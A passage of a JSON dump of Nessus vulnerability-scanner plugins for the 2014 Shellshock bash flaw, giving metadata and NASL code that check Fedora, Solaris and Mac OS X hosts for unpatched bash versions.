pkg:\"bash>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.0<=3.0.17\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.1<=3.1.18\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>3.2<=3.2.52\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.0<=4.0.39\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.1<=4.1.12\")) flag++;\nif (pkg_test(save_report:TRUE, 
pkg:\"bash-static>4.2<=4.2.48\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bash-static>4.3<4.3.25_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux_base-c6<6.5_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-11527.NASL", "href": "https://www.tenable.com/plugins/nessus/77941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11527.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77941);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11527\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 20 : bash-4.2.48-2.fc20 (2014-11527) 
(Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138687.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e5e2549\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.48-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "SunOS 5.9_x86: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 9 (x86) : 149080-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_X86_149080-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77912", "sourceData": "#%NASL_MIN_LEVEL 70300\n# @DEPRECATED@\n#\n# This script has been deprecated by solaris9_x86_149080.nasl.\n#\n# Disabled on 2014/10/13.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77912);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Solaris 9 (x86) : 149080-01\");\n script_summary(english:\"Check for patch 149080-01\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing Oracle Security Patch number 149080-01\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9_x86: bash patch. 
\n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149080-01\");\n script_set_attribute(attribute:\"solution\", value:\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #78113 (solaris9_x86_149080.nasl) instead.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\nif (!get_kb_item(\"Host/Solaris/pkginfo\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9_x86\", arch:\"i386\", patch:\"149080-01\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "The remote Mac OS X host has a version of Bash prior to 3.2.53(1)-release installed. 
It is, therefore, affected by a command injection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {}, "published": "2014-09-30T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:gnu:bash"], "id": "MACOSX_SHELLSHOCK_UPDATE.NASL", "href": "https://www.tenable.com/plugins/nessus/77971", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77971);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n 
script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection (Mac OS X) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution\nvulnerability, commonly referred to as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Bash prior to\n3.2.53(1)-release installed. It is, therefore, affected by a command\ninjection vulnerability via environment variable manipulation.\nDepending on the configuration of the system, an attacker could\nremotely execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT6495\");\n # https://lists.apple.com/archives/security-announce/2014/Sep/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5039c7b\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1767\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1768\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/DL1769\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor-supplied patch.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.[7-9]([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9 / 10.8 / 10.7\");\n\nver_sh = NULL;\nver_bash = NULL;\n\npat = \"version ([0-9.]+\\([0-9]+\\))(\\-[a-z]+)?\";\n\ncmd = \"bash --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_bash_disp = item[1];\n\ncmd = \"sh --version\";\nresult = exec_cmd(cmd:cmd);\nitem = eregmatch(pattern:pat, string:result);\nif (!isnull(item)) ver_sh_disp = item[1];\n\nif (ver_sh_disp)\n{\n ver_sh = ereg_replace(string:ver_sh_disp, pattern:\"\\(\", replace:\".\");\n ver_sh1 = ereg_replace(string:ver_sh, pattern:\"\\)\", replace:\"\");\n}\nelse ver_sh1 = NULL;\nif (ver_bash_disp)\n{\n ver_bash = ereg_replace(string:ver_bash_disp, pattern:\"\\(\", replace:\".\");\n ver_bash1 = ereg_replace(string:ver_bash, pattern:\"\\)\", replace:\"\");\n}\nelse ver_bash1 = NULL;\n\nfix_disp = '3.2.53(1)';\nfix = '3.2.53.1';\n\nif (\n (!isnull(ver_sh1) && ver_compare(ver:ver_sh1, fix:fix, strict:FALSE) == -1) ||\n (!isnull(ver_bash1) && ver_compare(ver:ver_bash1, fix:fix, strict:FALSE) == -1)\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + ver_bash_disp +\n '\\n Fixed version : ' + fix_disp +\n '\\n';\n security_hole(port:0, 
extra:report);\n }\n else security_hole(port:0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'Bash', ver_bash_disp);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:01", "description": "Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-11718.NASL", "href": "https://www.tenable.com/plugins/nessus/77945", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11718.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77945);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11718\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 21 : bash-4.3.25-2.fc21 (2014-11718) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Fix for CVE-2014-7169\n\nNote that Tenable Network Security has extracted 
the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/139129.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?625e21b5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 
2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"bash-4.3.25-2.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:10", "description": "SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14", "cvss3": {}, "published": "2014-10-09T00:00:00", "type": "nessus", "title": "Solaris 9 (sparc) : 149079-03", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS9_149079.NASL", "href": "https://www.tenable.com/plugins/nessus/78112", "sourceData": "#%NASL_MIN_LEVEL 
70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78112);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 9 (sparc) : 149079-03\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 149079-03\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.9: bash patch.\nDate this patch was last updated by Sun : Sep/30/14\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-03\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/149079-01\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this 
patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", 
obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11514.NASL", "href": "https://www.tenable.com/plugins/nessus/77939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77939);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", 